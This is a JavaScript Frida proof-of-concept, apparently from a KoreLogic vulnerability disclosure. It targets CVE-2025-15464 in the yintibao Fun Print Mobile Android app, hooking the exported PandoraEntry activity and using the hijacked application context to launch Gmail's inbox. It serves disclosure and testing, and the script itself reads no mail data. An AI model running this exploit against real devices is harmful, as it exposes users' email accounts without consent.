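/**
 * KL-001-2026-001 : Proof-of-Concept
 * CVE-2025-15464
 * Author: Felix Segoviano of KoreLogic, Inc.
 * yintibao Fun Print Mobile Unauthorized Access via Context Hijacking
 */
/**
 The contents of this proof-of-concept are copyright(c) 2026 KoreLogic, Inc.
 and are licensed under a Creative Commons Attribution Share-Alike 4.0
 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

 KoreLogic, Inc. is a founder-owned and operated company with a proven
 track record of providing security services to entities ranging from
 Fortune 500 to small and mid-sized companies. We are a highly skilled
 team of senior security consultants doing by-hand security assessments
 for the most important networks in the U.S. and around the world. We are
 also developers of various tools and resources aimed at helping the
 security community.
 https://www.korelogic.com/about-korelogic.html

 Our public vulnerability disclosure policy is available at:
 https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
*/

/*
 * Frida script. Loaded into the target app (io.dcloud.PandoraEntry host)
 * with `frida -U -f <package> -l <this file>` or attached to a running
 * instance.
 *
 * What it does:
 *   1. Hooks PandoraEntry.onCreate and, when the activity is started with
 *      android.intent.action.MAIN, tags the incoming Intent with
 *      demonstration extras.
 *   2. Two seconds later, from the hijacked application Context, starts
 *      Gmail's conversation-list activity with inbox-selecting extras.
 *   3. Monitors PackageManager.resolveActivity and prints a summary.
 *
 * Caveat for readers of the output: startActivity() only shows that the
 * hijacked Context can bring up Gmail's UI. Nothing in this script reads
 * mailbox or contact data, so the summary below reports "access
 * demonstrated" only when the Gmail launch itself did not throw, and
 * never claims a data read. Verify the end-to-end impact on the device
 * (which account/folder is shown) before treating the launch as evidence.
 * Frida itself runs with the app's full privileges; the instrumentation is
 * a vehicle for the demonstration, not the vulnerability - the
 * vulnerability is the exported activity accepting external intents.
 */
Java.perform(function () {
    console.log("[*] Starting Exported Activity Gmail Access Demonstration - FIXED VERSION");

    // Exact Gmail identifiers. Compared with === below; the old substring
    // match on "gm" also matched unrelated packages (e.g. anything with
    // "pgm" / "gms" in its name) and produced false "confirmed" lines.
    const GMAIL_PACKAGE = "com.google.android.gm";
    const GMAIL_INBOX_ACTIVITY = "com.google.android.gm.ConversationListActivityGmail";
    const ACTION_MAIN = "android.intent.action.MAIN";

    // Delays (ms): give the app time to finish initialising before the
    // Gmail launch, and give the launch time to resolve before summarising.
    const LAUNCH_DELAY_MS = 2000;
    const SUMMARY_DELAY_MS = 5000;

    // Global state tracking.
    //   exploitAttempted  - onCreate saw a MAIN intent and tagged it.
    //   impactDemonstrated - the delayed launch step has run (success or not).
    //   gmailLaunched     - context.startActivity(gmailIntent) returned
    //                       without throwing; this is the only thing the
    //                       summary is allowed to call a confirmed result.
    let exploitAttempted = false;
    let impactDemonstrated = false;
    let gmailLaunched = false;

    // === CORE HOOK: PandoraEntry onCreate ===
    // Main entry point for intent manipulation. The hook only inspects and
    // tags the Intent; the original onCreate always runs afterwards.
    try {
        const PandoraEntry = Java.use("io.dcloud.PandoraEntry");

        PandoraEntry.onCreate.implementation = function (bundle) {
            console.log("\n=== Intent Manipulation in onCreate ===");
            try {
                const intent = this.getIntent();
                const originalAction = intent.getAction();
                console.log("[*] Original Action: '" + (originalAction || "null") + "'");

                // getAction() may be null; normalise to a JS string first.
                const actionStr = originalAction ? originalAction.toString() : "";
                if (actionStr === ACTION_MAIN) {
                    console.log("[!] Injecting Gmail inbox access preparation");
                    // Demonstration extras only - they mark the Intent as
                    // touched by this PoC and are not consumed by Gmail.
                    intent.putExtra("DEMO_GMAIL_INBOX", GMAIL_PACKAGE);
                    intent.putExtra("DEMO_INBOX_ACCESS", ACTION_MAIN);
                    intent.putExtra("GMAIL_VIEW_MODE", "INBOX");
                    exploitAttempted = true;
                    console.log("[+] Exploit preparation completed");
                }
            } catch (intentError) {
                console.log("[-] Intent manipulation error: " + intentError);
            }
            // Always fall through to the real onCreate so the app keeps working.
            return this.onCreate(bundle);
        };
        console.log("[+] PandoraEntry.onCreate hook installed successfully");
    } catch (hookError) {
        console.log("[-] Failed to hook PandoraEntry: " + hookError);
    }

    // === DELAYED IMPACT DEMONSTRATION ===
    // Runs once, after app initialisation, and only if onCreate saw MAIN.
    // Timer callbacks are outside the Java.perform scope, hence the nested
    // Java.perform.
    setTimeout(function () {
        if (!exploitAttempted || impactDemonstrated) {
            return;
        }
        console.log("\n=== Gmail Access Impact Demonstration ===");
        Java.perform(function () {
            try {
                const Intent = Java.use("android.content.Intent");
                const ActivityThread = Java.use("android.app.ActivityThread");
                // Application context of the hijacked process.
                const context = ActivityThread.currentApplication();

                if (!context) {
                    console.log("[-] Could not obtain application context");
                    return;
                }

                console.log("[!] Attempting Gmail Inbox Access");
                // === PRIMARY: Direct Gmail Inbox Access ===
                try {
                    const gmailIntent = Intent.$new();
                    gmailIntent.setAction(ACTION_MAIN);
                    gmailIntent.addCategory("android.intent.category.LAUNCHER");
                    gmailIntent.setClassName(GMAIL_PACKAGE, GMAIL_INBOX_ACTIVITY);
                    // Starting an Activity from a non-Activity Context
                    // requires NEW_TASK.
                    gmailIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK.value);
                    // Gmail-specific extras: empty account = default account,
                    // "^i" = inbox folder identifier. NOTE(review): these
                    // extra names are taken from the original PoC; confirm
                    // they are honoured by the Gmail build on the test device.
                    gmailIntent.putExtra("account", "");
                    gmailIntent.putExtra("folder", "^i");
                    context.startActivity(gmailIntent);
                    // Only reached when startActivity did not throw
                    // (e.g. no SecurityException / ActivityNotFoundException).
                    gmailLaunched = true;
                    console.log("[!] SUCCESS: Gmail inbox accessed");
                } catch (gmailError) {
                    console.log("[-] Gmail specific launch failed: " + gmailError);
                }
                impactDemonstrated = true;
            } catch (demonstrationError) {
                console.log("[-] Impact demonstration failed: " + demonstrationError);
            }
        });
    }, LAUNCH_DELAY_MS);

    // === MONITORING HOOK: Activity Resolution (Lightweight) ===
    // Log-only. Matches the Gmail package exactly and contacts by class
    // name; keeps the hook cheap so it cannot destabilise the process.
    // NOTE(review): android.content.pm.PackageManager is abstract; if this
    // hook installs but never fires, hook the concrete
    // android.app.ApplicationPackageManager instead - confirm on target.
    try {
        const PackageManager = Java.use("android.content.pm.PackageManager");
        const resolveOverload = PackageManager.resolveActivity.overload("android.content.Intent", "int");
        const originalResolveActivity = resolveOverload;

        resolveOverload.implementation = function (intent, flags) {
            const result = originalResolveActivity.call(this, intent, flags);
            // Only report once the PoC is active and resolution succeeded.
            if (exploitAttempted && result) {
                try {
                    const pkg = intent.getPackage();
                    const component = intent.getComponent();
                    if (pkg && pkg === GMAIL_PACKAGE) {
                        console.log("[+] Gmail access resolution confirmed");
                    } else if (component && component.getClassName().includes("contacts")) {
                        console.log("[+] Contacts access resolution confirmed");
                    }
                } catch (monitorError) {
                    // Best-effort monitoring: never let logging break resolution.
                    console.log("[-] Monitor error (ignored): " + monitorError);
                }
            }
            return result;
        };
        console.log("[+] Lightweight PackageManager monitoring installed");
    } catch (monitorHookError) {
        console.log("[-] Could not install PackageManager monitor: " + monitorHookError);
    }

    // === FINAL SUMMARY ===
    // The impact lines are printed only when the Gmail launch actually
    // succeeded; previously they were printed whenever onCreate had fired,
    // even if startActivity had thrown.
    setTimeout(function () {
        if (!exploitAttempted) {
            console.log("\n[*] No MAIN action detected - exploit not triggered");
            return;
        }
        console.log("\n=== EXPLOITATION SUMMARY ===");
        console.log("[!] VULNERABILITY: Exported activity accepts external intents");
        console.log("[!] METHOD: Intent manipulation via PandoraEntry");
        if (gmailLaunched) {
            console.log("[!] IMPACT: Gmail inbox launched from hijacked app context");
            console.log("[!] DATA: Verify on-device which account/inbox was shown");
            console.log("[!] STATUS: Demonstration completed successfully");
        } else {
            console.log("[-] IMPACT: Gmail launch not confirmed (see errors above)");
            console.log("[-] STATUS: Demonstration incomplete");
        }
        console.log("=====================================");
    }, SUMMARY_DELAY_MS);

    console.log("[*] Exported Activity hooks installed successfully (FIXED VERSION)");
});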